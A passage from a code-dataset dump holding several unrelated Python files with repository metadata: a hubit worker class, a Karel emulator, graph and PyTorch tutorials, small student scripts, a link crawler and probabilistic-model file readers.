def get_bindings(bindings: List[HubitBinding], query_path: HubitQueryPath):\n \"\"\"Make symbolic binding specific i.e. replace index IDs\n with actual indices based on query\n\n Args:\n bindings: List of bindings\n query_path: Query path\n\n Raises:\n HubitWorkerError: Raised if query does not match any of the bindings\n or if query is not expanded\n\n Returns:\n [type]: TODO [description]\n \"\"\"\n if query_path.wildcard_chr in query_path:\n raise HubitWorkerError(\n f\"Query path '{query_path}' contains illegal character '{query_path.wildcard_chr}'. Should already have been expanded.\"\n )\n\n binding_paths = [binding.path for binding in bindings]\n # Get indices in binding_paths list that match the query\n idxs_match = query_path.idxs_for_matches(binding_paths)\n if len(idxs_match) == 0:\n fstr = 'Query \"{}\" did not match attributes provided by worker ({}).'\n raise HubitWorkerError(fstr.format(query_path, \", \".join(binding_paths)))\n\n # Get the location indices from query. Using the first binding path that\n # matched the query suffice\n idxval_for_idxid = {}\n for binding in bindings:\n if query_path.path_match(binding.path):\n identifiers = binding.path.get_index_identifiers()\n ranges = query_path.ranges()\n idxval_for_idxid.update(dict(zip(identifiers, ranges)))\n break\n\n path_for_name = _Worker.bindings_from_idxs(bindings, idxval_for_idxid)\n\n return path_for_name, idxval_for_idxid\n\n @staticmethod\n def expand(path_for_name, tree_for_idxcontext, model_path_for_name):\n paths_for_name = {}\n for name, path in path_for_name.items():\n tree = tree_for_idxcontext[model_path_for_name[name].index_context]\n pruned_tree = tree.prune_from_path(path, inplace=False)\n paths_for_name[name] = pruned_tree.expand_path(path)\n return paths_for_name\n\n def consumes_input_only(self):\n return self._consumes_input_only\n\n def binding_map(self, binding_type):\n return self.component.binding_map(binding_type)\n\n # def make_map(bindings):\n # return {binding.name: binding.path for binding in bindings}\n\n # if type == \"provides\": # provides is always present in worker\n # return make_map(self.cfg[\"provides\"])\n # elif type in (\"results\", \"input\"):\n # if _Worker.consumes_type(self.cfg, type):\n # return make_map(self.cfg[\"consumes\"][type])\n # else:\n # return {}\n # else:\n # raise HubitWorkerError(f'Unknown type \"{type}\"')\n\n # @staticmethod\n # def consumes_type(cfg: Dict, consumption_type: str) -> bool:\n # \"\"\"Check if configuration (cfg) consumes the \"consumption_type\"\n\n # Args:\n # cfg (Dict): Componet configuration\n # consumption_type (str): The consumption type. Can either be \"input\" or \"results\". Validity not checked.\n\n # Returns:\n # bool: Flag indicating if the configuration consumes the \"consumption_type\"\n # \"\"\"\n # return (\n # \"consumes\" in cfg\n # and consumption_type in cfg[\"consumes\"]\n # and len(cfg[\"consumes\"][consumption_type]) > 0\n # )\n\n def paths_provided(self):\n \"\"\"Generates a list of the (expanded) paths that will be provided.\n\n Returns:\n List: Sequence of paths that will be provided by the worker\n \"\"\"\n return [\n path for paths in self.rpaths_provided_for_name.values() for path in paths\n ]\n\n def result_for_path(self):\n \"\"\"\n Convert the results from internal attribute names to shared data names\n and expand ilocs\n \"\"\"\n\n # TODO: Work only with : and not..... but not elegant...\n out = {}\n for name, paths in self.rpaths_provided_for_name.items():\n if len(paths) > 1:\n _out = {\n path: val\n for path, val in zip(traverse(paths), traverse(self.results[name]))\n }\n else:\n _out = {paths[0]: self.results[name]}\n out.update(_out)\n return out\n\n def results_ready(self):\n \"\"\"\n Checks that all attributes provided have been calculated\n \"\"\"\n return set(self.results.keys()) == set(self.rpath_provided_for_name.keys())\n\n def join(self):\n \"\"\"Join process\"\"\"\n if self.job is not None:\n self.job.terminate()\n self.job.join()\n\n def use_cached_result(self, result):\n logging.info(f'Worker \"{self.id}\" using CACHE for query \"{self.query}\"')\n # Set each key-val pair from the cached results to the worker results\n # The worker results may be a managed dict\n for key, val in result.items():\n self.results[key] = val\n self._results_from = self.RESULTS_FROM_CACHE_ID\n\n def _func_wrapped(self, inputval_for_name, results, did_complete):\n self.func(inputval_for_name, results)\n with did_complete.get_lock():\n did_complete.value = Value(c_bool, True)\n self._callback_completed(self)\n\n def _mp_func(self, inputval_for_name):\n self.job = multiprocessing.Process(\n target=self._func_wrapped,\n args=(inputval_for_name, self.results, self._did_complete),\n )\n self.job.daemon = False\n self.job.start()\n\n def _sp_func(self, inputval_for_name):\n self.func(inputval_for_name, self.results)\n self._did_complete = True\n self._callback_completed(self)\n\n def _work_dryrun(self):\n \"\"\"\n Sets all results to None\n \"\"\"\n for name in self.rpath_provided_for_name.keys():\n tree = self.tree_for_idxcontext[\n self.provided_mpath_for_name[name].index_context\n ]\n self.results[name] = tree.none_like()\n\n self._did_complete = True\n self._callback_completed(self)\n\n def _work(self):\n \"\"\"\n Executes actual work\n \"\"\"\n logging.info(f'Worker \"{self.id}\" STARTED for query \"{self.query}\"')\n\n # Notify the hubit model that we are about to start the work\n # create single input\n inputval_for_name = ReadOnlyDict(\n {\n **self.inputval_for_name,\n **self.resultval_for_name,\n }\n )\n if self.use_multiprocessing:\n self._mp_func(inputval_for_name)\n else:\n self._sp_func(inputval_for_name)\n self._results_from = self.RESULTS_FROM_CALCULATION_ID\n\n logging.debug(\"\\n**STOP WORKING**\\n{}\".format(self.__str__()))\n logging.info(f'Worker \"{self.id}\" finished for query \"{self.query}\"')\n\n @staticmethod\n def reshape(path_for_name, val_for_path):\n \"\"\"\n Convert val_for_path to val_for_name i.e.\n from external names to internal names with expected shapes\n \"\"\"\n return {\n name: reshape(path, val_for_path) for name, path in path_for_name.items()\n }\n\n def is_ready_to_work(self):\n return self._consumed_input_ready and self._consumed_results_ready\n\n def _prepare_work(self):\n logging.debug(\"Let the work begin: {}\".format(self.workfun))\n self._consumed_data_set = True\n self._did_start = True\n\n def work(self):\n \"\"\" \"\"\"\n self._prepare_work()\n self.workfun()\n\n def set_results(self, results):\n \"\"\"Set pre-computed results directly on worker.\n Don't wait for input.\n \"\"\"\n self._prepare_work()\n self.use_cached_result(results)\n self._did_complete = True\n self._callback_completed(self)\n\n def set_consumed_input(self, path: HubitQueryPath, value):\n if path in self.pending_input_paths:\n self.pending_input_paths.remove(path)\n self.inputval_for_path[path] = value\n self._consumed_input_ready = len(self.pending_input_paths) == 0\n\n # Create inputval_for_name as soon as we can to allow results_id to be formed\n if self._consumed_input_ready:\n self.inputval_for_name = _Worker.reshape(\n self.ipaths_consumed_for_name, self.inputval_for_path\n )\n\n if len(self.pending_input_paths) == 0:\n self.input_checksum = self._input_checksum()\n\n if self.is_ready_to_work():\n self.resultval_for_name = _Worker.reshape(\n self.rpaths_consumed_for_name, self.resultval_for_path\n )\n self.results_checksum = self._results_checksum()\n self._callback_ready(self)\n\n # if not self.caching:\n # self.work_if_ready()\n\n def set_consumed_result(self, path, value):\n if path in self.pending_results_paths:\n self.pending_results_paths.remove(path)\n self.resultval_for_path[path] = value\n\n self._consumed_results_ready = len(self.pending_results_paths) == 0\n\n if self.is_ready_to_work():\n self.resultval_for_name = _Worker.reshape(\n self.rpaths_consumed_for_name, self.resultval_for_path\n )\n self.results_checksum = self._results_checksum()\n\n self._callback_ready(self)\n\n def set_values(self, inputdata, resultsdata: FlatData):\n \"\"\"\n Set the consumed values if they are ready otherwise add them\n to the list of pending items\n \"\"\"\n # Check consumed input (should not have any pending items by definition)\n for path in self.iname_for_path.keys():\n if path in inputdata.keys():\n self.inputval_for_path[path] = inputdata[path]\n else:\n self.pending_input_paths.append(path)\n\n # Check consumed results\n for path in self.rname_for_path.keys():\n if path in resultsdata.keys():\n self.resultval_for_path[path] = resultsdata[path]\n else:\n self.pending_results_paths.append(path)\n\n self._consumed_input_ready = len(self.pending_input_paths) == 0\n self._consumed_results_ready = len(self.pending_results_paths) == 0\n\n # Create inputval_for_name as soon as we can to allow results_id to be formed\n if self._consumed_input_ready:\n self.inputval_for_name = _Worker.reshape(\n self.ipaths_consumed_for_name, self.inputval_for_path\n )\n self.input_checksum = self._input_checksum()\n\n if self._consumed_results_ready:\n self.resultval_for_name = _Worker.reshape(\n self.rpaths_consumed_for_name, self.resultval_for_path\n )\n self.results_checksum = self._results_checksum()\n\n if self.is_ready_to_work():\n self._callback_ready(self)\n\n return (\n copy.copy(self.pending_input_paths),\n copy.copy(self.pending_results_paths),\n )\n\n def idstr(self):\n \"\"\"\n Make an ID string for the worker class that will be the same\n if all ilocs are the same for the same component\n \"\"\"\n return \"name={} v{} idxs={}\".format(\n self.id,\n self.version,\n \"&\".join([f\"{k}={v}\" for k, v in self.idxval_for_idxid.items()]),\n )\n\n def _input_checksum(self) -> str:\n \"\"\"checksum for the input values\"\"\"\n return hashlib.md5(\n # f'{self.inputval_for_name}_{id(self.func)}'.encode('utf-8')\n json.dumps(\n [\n sorted(self.inputval_for_name.items(), key=itemgetter(0)),\n str(self.component.path),\n self.func.__name__,\n ]\n ).encode()\n ).hexdigest()\n\n def _results_checksum(self) -> str:\n \"\"\"\n We want to know the checksum before the results values are available.\n The results will be identifiable by\n - the worker input (input_checksum)\n - the consumed results\n \"\"\"\n return hashlib.md5(\n json.dumps(\n [\n self.input_checksum,\n sorted(self.resultval_for_name.items(), key=itemgetter(0)),\n ]\n ).encode()\n ).hexdigest()\n\n def __str__(self):\n n = 100\n fstr1 = \"{:30}{}\\n\"\n strtmp = \"=\" * n + \"\\n\"\n strtmp += \"ID: {}\\n\".format(self.idstr())\n strtmp += \"Function: {}\\n\".format(self.func)\n strtmp += \"Query: {}\\n\".format(self.query)\n strtmp += \"-\" * n + \"\\n\"\n strtmp += fstr1.format(\"Results provided\", self.rpath_provided_for_name)\n strtmp += fstr1.format(\n \"Results provided expanded\", self.rpaths_provided_for_name\n )\n strtmp += fstr1.format(\"Input consumed\", self.ipath_consumed_for_name)\n strtmp += fstr1.format(\"Input consumed expanded\", self.ipaths_consumed_for_name)\n strtmp += fstr1.format(\"Results consumed\", self.rpath_consumed_for_name)\n strtmp += fstr1.format(\n \"Results consumed expanded\", self.rpaths_consumed_for_name\n )\n\n strtmp += \"-\" * n + \"\\n\"\n strtmp += fstr1.format(\"Input attr values\", self.inputval_for_name)\n strtmp += fstr1.format(\"Input path values\", self.inputval_for_path)\n strtmp += fstr1.format(\"Results attr values\", self.resultval_for_name)\n strtmp += fstr1.format(\"Results path values\", self.resultval_for_path)\n strtmp += fstr1.format(\"Input pending\", self.pending_input_paths)\n strtmp += fstr1.format(\"Results pending\", self.pending_results_paths)\n\n strtmp += \"-\" * n + \"\\n\"\n strtmp += f\"Ready to work: {self.is_ready_to_work()}\\n\"\n strtmp += f\"Did start: {self._did_start}\\n\"\n strtmp += f\"Did complete: {self._did_complete}\\n\"\n strtmp += \"Results {}\\n\".format(self.results)\n strtmp += f\"Results from: {self._results_from}\\n\"\n\n strtmp += \"=\" * n + \"\\n\"\n\n return strtmp\n\n def used_cache(self):\n return self._results_from == self.RESULTS_FROM_CACHE_ID\n","repo_name":"mrsonne/hubit","sub_path":"hubit/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":23071,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"18590427659","text":"import copy\nimport sys\nimport os\n\nclass EmuLocationTuple(object):\n def __init__(self, name, index):\n self.name = name\n self.index = index\n\n def __str__(self):\n return \"{0}:{1}\".format(self.name, self.index)\n\nclass EmuLocation(object):\n def __init__(self, tuples):\n self.tuples = tuples\n\n def add(self, name, index):\n tuples = copy.deepcopy(self.tuples)\n tuples.append(EmuLocationTuple(name, index))\n return EmuLocation(tuples)\n\n def __str__(self):\n return \" \".join([str(x) for x in self.tuples])\n\nclass EmuTick(object):\n def __init__(self, location, type, value):\n self.location = location\n self.type = type\n self.value = value\n\nclass EmuResult(object):\n def __init__(self, status, inpgrid, outgrid, ticks, actions):\n self.status = status\n self.inpgrid = inpgrid\n self.outgrid = outgrid\n self.ticks = ticks\n self.actions = actions\n self.crashed = False\n\nclass FastEmuException(BaseException):\n def __init__(self, status):\n self.status = status\n\nclass EmuState(object):\n def __init__(self, world, max_ticks, max_actions):\n self.world = world\n self.max_ticks = max_ticks\n self.max_actions = max_actions\n self.crashed = False\n self.ticks = []\n self.actions = []\n\n def add_action(self, location, type):\n action_index = len(self.actions)\n self.__add_tick(EmuTick(location, 'action', action_index))\n self.actions.append(type)\n\n def add_condition_tick(self, location, result):\n self.__add_tick(EmuTick(location, 'condition', result))\n\n def add_repeat_tick(self, location, index):\n self.__add_tick(EmuTick(location, 'repeat', index))\n\n def __add_tick(self, tick):\n if self.max_ticks is not None and \\\n self.max_ticks != -1 and \\\n len(self.ticks) >= self.max_ticks:\n raise FastEmuException('MAX_TICKS')\n self.ticks.append(tick)\n\n def __add_action(self, action):\n if self.max_actions is not None and \\\n self.max_actions != -1 and \\\n len(self.actions) >= self.max_actions:\n raise FastEmuException('MAX_ACTIONS')\n self.actions.append(action)\n\nclass FastEmulator(object):\n def __init__(self, max_ticks=None, max_actions=None):\n self.max_ticks = max_ticks\n self.max_actions = max_actions\n actions = [\n 'move',\n 'turnLeft',\n 'turnRight',\n 'pickMarker',\n 'putMarker',\n ]\n\n self.action_hash = {}\n for x in actions:\n self.action_hash[x] = 1\n\n conditionals = [\n 'markersPresent',\n 'noMarkersPresent',\n 'leftIsClear',\n 'rightIsClear',\n 'frontIsClear',\n ]\n\n self.conditional_hash = {}\n for x in conditionals:\n self.conditional_hash[x] = 1\n\n def emulate(self, ast, inpgrid):\n j_ast = ast.getJson()\n world = copy.deepcopy(inpgrid)\n state = EmuState(world, self.max_ticks, self.max_actions)\n location = EmuLocation([])\n\n status = 'OK'\n try:\n self.__emulate_block(j_ast, 'run', location, state)\n except FastEmuException as e:\n status = e.status\n\n result = EmuResult(status, inpgrid, state.world, state.ticks, state.actions)\n\n return result\n\n def __emulate_condition(self, condition, location, state):\n result = self.__eval_condition_recursive(condition, state)\n state.add_condition_tick(location, result)\n return result\n\n def __eval_condition_recursive(self, condition, state):\n type = condition['type']\n if type == 'not':\n result = self.__eval_condition_recursive(condition['condition'], state)\n return not result\n if type not in self.conditional_hash:\n raise Exception(\"Type not supported: {0}\".format(type))\n\n if type == 'noMarkersPresent':\n result = not state.world.markersPresent()\n else:\n conditional_func = getattr(state.world, type)\n result = conditional_func()\n return result\n\n def __emulate_block(self, parent, relationship, location, state):\n block = parent[relationship]\n for st_idx, node in enumerate(block):\n child_location = location.add(relationship, st_idx)\n type = node['type']\n if type in self.action_hash:\n action_func = getattr(state.world, type)\n action_func()\n state.add_action(child_location, type)\n if state.world.isCrashed():\n raise FastEmuException('CRASHED')\n elif type == 'repeat':\n times = node['times']\n for i in xrange(times):\n state.add_repeat_tick(child_location, i)\n self.__emulate_block(node, 'body', child_location, state)\n elif type == 'while':\n while True:\n res = self.__emulate_condition(node['condition'], child_location, state)\n if not res:\n break\n self.__emulate_block(node, 'body', child_location, state)\n elif type == 'if':\n if self.__emulate_condition(node['condition'], child_location, state):\n self.__emulate_block(node, 'body', child_location, state)\n elif type == 'ifElse':\n if self.__emulate_condition(node['condition'], child_location, state):\n self.__emulate_block(node, 'ifBody', child_location, state)\n else:\n self.__emulate_block(node, 'elseBody', child_location, state)\n else:\n raise Exception(\"Unknown type: {0}\".format(type))\n","repo_name":"bunelr/GandRL_for_NPS","sub_path":"karel/fast_emulator.py","file_name":"fast_emulator.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"66"} +{"seq_id":"8384392809","text":"import networkx as nx\n\n# 创建有向图并添加节点、边以及权重(包括负权重)\nG = nx.DiGraph()\n\n# 添加节点和有向边(包括负权重)\nG.add_edges_from([(1, 2, {'weight': 2}),\n (1, 3, {'weight': -3}), # 负权重\n (2, 3, {'weight': 1}),\n (2, 4, {'weight': -5}), # 负权重\n (3, 4, {'weight': 3}),\n (3, 5, {'weight': -2}), # 负权重\n (4, 5, {'weight': 2})])\n\n# 指定起始节点和终点节点\nsource = 1\ntarget = 5\n\n# 使用 Bellman-Ford 算法计算特定源点到终点的最短路径\ntry:\n shortest_path_length, shortest_path = nx.single_source_bellman_ford(G, source=source, target=target, weight='weight')\n\n print(f\"Shortest path from {source} to {target}:\")\n print(\"Length:\", shortest_path_length)\n print(\"Path:\", shortest_path)\n\nexcept nx.NetworkXNoPath:\n print(f\"No path from {source} to {target}.\")\nexcept nx.NetworkXUnbounded:\n print(\"Graph contains a negative weight cycle.\")\n","repo_name":"MarsPJ/optimization-model","sub_path":"ShortestPath/Bellman-Ford/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4575769689","text":"#Tiffi Westcott\n#Exam 1: asks for two positive integers and decides which are bigger, resulting in modular division that is spit out to the user. \n\n#Requests two positive integers from user.\nfirstInput = input(\"Enter your first positive integer: \")\n\n#Try - except loops verify inputs are integers.\ntry:\n intInput1 = int(firstInput)\n if intInput1 < 0:\n print (\"That is not a positive integer.\")\nexcept ValueError:\n print (\"The input is not valid.\")\n\n#Requests two positive integers from user.\nsecondInput = input(\"Enter your second positive integer: \")\n\n#Try - except loops verify inputs are integers.\ntry:\n intInput2 = int(secondInput)\n if intInput2 < 0:\n print (\"That is not a positive integer.\")\nexcept ValueError:\n print (\"That's not valid input.\")\n\n#Puts division statements into variables for ease of use.\ndivision1 = intInput1%intInput2\ndivision2 = intInput2%intInput1\n\n#If - elif - else determines which of the numbers are smaller and larger, then prints result statements.\nif intInput1 > intInput2:\n print (\"The number that is larger is: \", repr(intInput1), \"and the number that is smaller is\", repr(intInput2),\".\")\n print (\"The division result is... \", division1,\".\")\nelif intInput2 > intInput1:\n print (\"The number that is larger is: \", repr(intInput2), \"and the number that is smaller is\", repr(intInput1),\".\")\n print (\"The division result is... \", division2,\".\")\nelse:\n print (\"The numbers are both equal: \", intInput1,\".\")\n","repo_name":"t1ffi/python","sub_path":"exam1.py","file_name":"exam1.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19332838074","text":"\"\"\"Rock paper sciccors voice game\"\"\"\n\nimport sys\nfrom random import randint\n\nfrom .aiy.audio import say\nfrom .aiy.cloudspeech import get_recognizer\n\n\ndef rock_paper_scissors() -> None:\n \"\"\"Rock paper scissors game\"\"\"\n recognizer = get_recognizer()\n computer_choice = randint(0, 2)\n choices = [\"rock\", \"scissors\", \"paper\"]\n for choice in choices:\n recognizer.expect_phrase(choice)\n say(\"Ok lets play. Say your choice in 3...2...1\")\n text = recognizer.recognize()\n if text is None:\n say(\"Sorry, I did not hear you.\")\n return\n if sys.stdout.isatty():\n print(\"You said:\", text)\n for choice in choices:\n if choice in text:\n player_choice = choices.index(choice)\n break\n if player_choice is None:\n say(\"Sorry, I did not hear you.\")\n return\n say(\"I chose {}\".format(choices[computer_choice]))\n if player_choice == computer_choice:\n say(\"Draw i guess\")\n elif (\n (computer_choice == 0 and player_choice == 2)\n or (computer_choice == 1 and player_choice == 0)\n or (computer_choice == 2 and player_choice == 1)\n ):\n say(\"You Win\")\n else:\n say(\"I Win\")\n","repo_name":"butlerx/assistant","sub_path":"src/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21526992992","text":"consumidor = input(\"Digite o tipo de consumiodor: \")\r\n\r\nconsumoEnergia = float(input(\"Digite o consumo: \"))\r\n\r\nif consumidor == \"I\":\r\n calculo = 0.68 * consumoEnergia + 34\r\n \r\nelif consumidor == \"C\":\r\n calculo = 0.37 * consumoEnergia + 45\r\n \r\nelif consumidor == \"R\":\r\n calculo = 0.77 * consumoEnergia - 22\r\n \r\nprint(f\"O valor será de R${calculo}\")\r\n","repo_name":"viniciusxv27/TP_Aula1","sub_path":"lista2/exercicio14.py","file_name":"exercicio14.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"41406708929","text":"import requests\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\n\r\nclass crawl_link_web:\r\n\r\n\tdef __init__(self, dom, cate, link):\r\n\r\n\t\tself.dom = dom\r\n\t\tself.cate = cate\r\n\t\tself.link = link\r\n\r\n\tdef getcate(self):\r\n\t\tprint(\"2__\")\r\n\t\t\r\n\t\treq = requests.get(self.dom).text\r\n\t\tsoup = BeautifulSoup(req, \"html.parser\")\r\n\t\tcate =soup.select(self.cate)\r\n\t\tct = []\r\n\r\n\t\tfor c in cate[1:]:\r\n\t\t\tl = c.get(\"href\")\r\n\t\t\tif l.startswith(\"https://\"):\r\n\t\t\t\tct.append(l)\r\n\t\t\t\r\n\t\t\tif l.startswith(\"/\"):\r\n\t\t\t\tct.append(self.dom + l[1:])\r\n\t\t\t\t\r\n\t\treturn ct \r\n\r\n\r\n\tdef getlink(self,ca):\r\n\t\tli = []\r\n\t\ttry:\r\n\t\t\tfor c in ca:\r\n\t\t\t\treq = requests.get(c).text\r\n\t\t\t\tsoup = BeautifulSoup(req, \"html.parser\")\r\n\t\t\t\tlink = soup.select(self.link)\r\n\r\n\t\t\t\tfor i in link: \r\n\t\t\t\t\tl = i.get('href')\r\n\t\t\t\t\tif l.startswith(\"https://\"):\t\r\n\t\t\t\t\t\tli.append(l)\r\n\r\n\t\t\t\t\tif l.startswith(\"/\"): \t\r\n\t\t\t\t\t\tli.append(self.dom + l[1:])\r\n\t\t\t\t\t\t\t\r\n\t\t\treturn li\r\n\t\texcept :\r\n\t\t\tpass\r\n\r\n\r\n","repo_name":"huyphan201/API_rest_test","sub_path":"crawler/crawler_link.py","file_name":"crawler_link.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6763554829","text":"import torch\nimport matplotlib.pyplot as plt\nimport torch.nn.functional as F # 激励函数都在这\n\n# 假数据\nn_data = torch.ones(100, 2) # 数据的基本形态\nx0 = torch.normal(2*n_data, 1) # 类型0 x data (tensor), shape=(100, 2)\ny0 = torch.zeros(100) # 类型0 y data (tensor), shape=(100, 1)\nx1 = torch.normal(-2*n_data, 1) # 类型1 x data (tensor), shape=(100, 2)\ny1 = torch.ones(100) # 类型1 y data (tensor), shape=(100, 1)\n\n# 注意 x, y 数据的数据形式是一定要像下面一样 (torch.cat 是在合并数据)\nx = torch.cat((x0, x1), 0).type(torch.FloatTensor) # FloatTensor = 32-bit floating\ny = torch.cat((y0, y1), ).type(torch.LongTensor) # LongTensor = 64-bit integer\n\nprint(x)\nprint(y)\n\nplt.scatter(x.data.numpy()[:, 0], x.data.numpy()[:, 1], c=y.data.numpy(), s=100, lw=0, cmap='RdYlGn')\nplt.show()\n\n\n\nclass Net(torch.nn.Module): # 继承 torch 的 Module\n def __init__(self, n_feature, n_hidden, n_output):\n super(Net, self).__init__() # 继承 __init__ 功能\n # 定义每层用什么样的形式\n self.hidden = torch.nn.Linear(n_feature, n_hidden) # 隐藏层线性输出\n self.predict = torch.nn.Linear(n_hidden, n_output) # 输出层线性输出\n\n def forward(self, x): # 这同时也是 Module 中的 forward 功能\n # 正向传播输入值, 神经网络分析出输出值\n x = F.relu(self.hidden(x)) # 激励函数(隐藏层的线性值)\n x = self.predict(x) # 输出值\n return x\n\nnet = Net(n_feature=2, n_hidden=10, n_output=2)\n\nprint(net) # net 的结构\n\nplt.ion()\nplt.show()\n\n# # optimizer 是训练的工具\noptimizer = torch.optim.SGD(net.parameters(), lr=0.1) # 传入 net 的所有参数, 学习率\nloss_func = torch.nn.CrossEntropyLoss() # 在分类问题上常用的分类器,针对独热编码的误差函数计算\n\nfor t in range(100):\n out = net(x) # 喂给 net 训练数据 x, 输出预测值\n\n loss = loss_func(out, y) # 计算两者的误差\n print(\n 'out:{}\\n'.format(out),\n 'y:{}\\n'.format(y)\n )\n\n optimizer.zero_grad() # 清空上一步的残余更新参数值\n loss.backward() # 误差反向传播, 计算参数更新值\n optimizer.step() # 将参数更新值施加到 net 的 parameters 上\n # 接着上面来\n if t % 2 == 0:\n plt.cla()\n # 过了一道 softmax 的激励函数后的最大概率才是预测值\n # print(torch.max(F.softmax(out), 1))\n prediction = torch.max(F.softmax(out), 1)[1]\n pred_y = prediction.data.numpy().squeeze()\n target_y = y.data.numpy()\n plt.scatter(x.data.numpy()[:, 0], x.data.numpy()[:, 1], c=pred_y, s=100, lw=0, cmap='RdYlGn')\n accuracy = sum(pred_y == target_y)/200. # 预测中有多少和真实值一样\n plt.text(1.5, -4, 'Accuracy=%.2f' % accuracy, fontdict={'size': 20, 'color': 'red'})\n plt.pause(0.1)","repo_name":"wwyf/learn_pytorch","sub_path":"morvan/3-pytorch-classification.py","file_name":"3-pytorch-classification.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34520890043","text":"from constants import *\nfrom pyGM.filetypes import readUai, readEvidence14 #readFileByTokens\nfrom pyGM.varset_py import Var, VarSet\nfrom pyGM import Factor\nfrom valuation import Valuation\n\n\n########################################################################################################################\n# helper functions\nclass FileReadError(Exception):\n \"\"\"Error while reading an input problem file\"\"\"\n\n\nclass FileWriteError(Exception):\n \"\"\"Error while writing an output problem file\"\"\"\n\n\ndef get_a_line(filename):\n for line in open(filename):\n line_strip = line.strip()\n if line_strip:\n yield line_strip\n\n\ndef get_a_token(filename):\n for each_line in get_a_line(filename):\n for each_token in each_line.split():\n if each_token:\n yield each_token\n\n\ndef make_valuations(factors, factor_types):\n valuations = []\n assert len(factors) == len(factor_types), 'length of both list should match'\n for f, t in zip(factors, factor_types):\n if t == 'P':\n valuations.append(Valuation(f, Factor([], 0.0) ))\n elif t == 'U':\n valuations.append(Valuation(Factor([], 1.0), f))\n else:\n raise FileReadError\n return valuations\n\n\ndef scope_of_vars_to_int(scope):\n return [v.label for v in scope]\n\n\ndef scopes_of_vars_to_int(scopes):\n return [scope_of_vars_to_int(sc) for sc in scopes]\n\n\ndef make_weights(var_types):\n return [1.0 if el == 'C' else 0.0 for el in var_types]\n\n\ndef remove_constant_factors(factors, is_log = False, factor_types=None):\n raise NotImplementedError\n\n\ndef remove_free_variables(factors, variables, var_types=None, weights=None):\n raise NotImplementedError\n\n\ndef remove_evidence():\n raise NotImplementedError\n\n\n########################################################################################################################\n# simple read and write functions\ndef read_uai(filename):\n # todo re-write and remove dependency\n \"\"\" read conventional uai file \"\"\"\n return readUai(filename) # returns list of factors\n\n\ndef read_evid(filename):\n # todo re-write and remove dependency\n return readEvidence14(filename)\n\n\ndef read_vo(filename):\n vars = []\n iw = None\n for each_line in get_a_line(filename):\n if not each_line.startswith('#'):\n vars.append(int(each_line))\n if iw is None and 'iw=' in each_line:\n iw = int(each_line.split('iw=')[-1])\n if vars[0] != len(vars)-1:\n raise FileReadError\n return vars[1:], iw # elim_order, induced width\n\n\ndef read_map(filename):\n vars = []\n for each_line in get_a_line(filename):\n if not each_line.startswith('#'):\n for each_token in each_line.split():\n vars.append(int(each_token))\n if vars[0] != len(vars)-1:\n raise FileReadError\n return vars[1:]\n\n\ndef read_pvo(filename):\n fp = open(filename, 'r')\n blocks = []\n for each_block in fp.read().split(';'):\n if len(each_block.strip()):\n if each_block.startswith('#'):\n continue\n current_block = [int(el) for el in each_block.split()]\n blocks.append(current_block)\n # blocks.append([int(el.strip()) for el in each_block.split() if not el.strip().startswith('#') and el.strip()])\n nvars = blocks[0][0] # first block total number of variables\n nblocks = blocks[1][0] # second block total number of blocks\n assert len(blocks[2:]) == nblocks, \"number of blocks wrong while reading pvo\"\n # if len(blocks[2:]) != nblocks:\n # raise FileReadError\n assert nvars == sum([len(el) for el in blocks[2:]]), \"number of variables wrong while reading pvo\"\n # if nvars != sum([len(el) for el in blocks[2:]]):\n # raise FileReadError\n fp.close()\n return blocks[2:], nblocks, nvars\n\n\ndef fix_pvo(filename):\n fp = open(filename, 'r')\n blocks = []\n for each_block in fp.read().split(';'):\n if len(each_block.strip()):\n if each_block.startswith('#'):\n continue\n current_block = [int(el) for el in each_block.split()]\n blocks.append(current_block)\n nvars = blocks[0][0] # first block total number of variables\n nblocks = blocks[1][0] # second block total number of blocks\n assert len(blocks[2:]) == nblocks, \"number of blocks wrong while reading pvo\"\n fp.close()\n\n history=set()\n old_blocks = blocks[2:]\n new_blocks = []\n if nvars != sum([len(el) for el in old_blocks]):\n for old_block in reversed(old_blocks): # temporal order\n current_bk = [b for b in old_block if b not in history]\n if current_bk:\n new_blocks.append(current_bk)\n history.update(current_bk)\n new_blocks = list(reversed(new_blocks)) # elim order\n assert sum([len(el) for el in new_blocks]) == nvars, \"the number of variables should match\"\n write_pvo_from_partial_elim_order(filename, new_blocks)\n\n\ndef read_mi(filename):\n gen = get_a_token(filename)\n num_vars = int(next(gen))\n var_types = [next(gen).upper() for _ in range(num_vars)]\n return num_vars, var_types # num vars, type of vars in upper case\n\n\ndef read_id(filename):\n gen = get_a_token(filename)\n num_vars = int(next(gen))\n var_types = [next(gen).upper() for _ in range(num_vars)]\n num_funcs = int(next(gen))\n factor_types = [next(gen).upper() for _ in range(num_funcs)]\n return num_vars, var_types, num_funcs, factor_types\n\n\ndef read_pt(filename):\n try:\n gen = get_a_token(filename)\n num_vars = int(next(gen))\n return [int(next(gen)) for _ in range(num_vars)]\n except:\n return []\n\n\ndef read_standard_uai(file_name, sort_scope=True, skip_table=False):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name + \".uai\"\n file_info = {'domains': [], 'scopes': [], 'factors': []}\n gen = get_a_token(uai_file_name)\n type = next(gen)\n file_info['nvar'] = int(next(gen))\n file_info['domains'] = [int(next(gen)) for i in range(file_info['nvar'])]\n nfuncs = int(next(gen))\n for i in range(nfuncs):\n scope_size = int(next(gen))\n 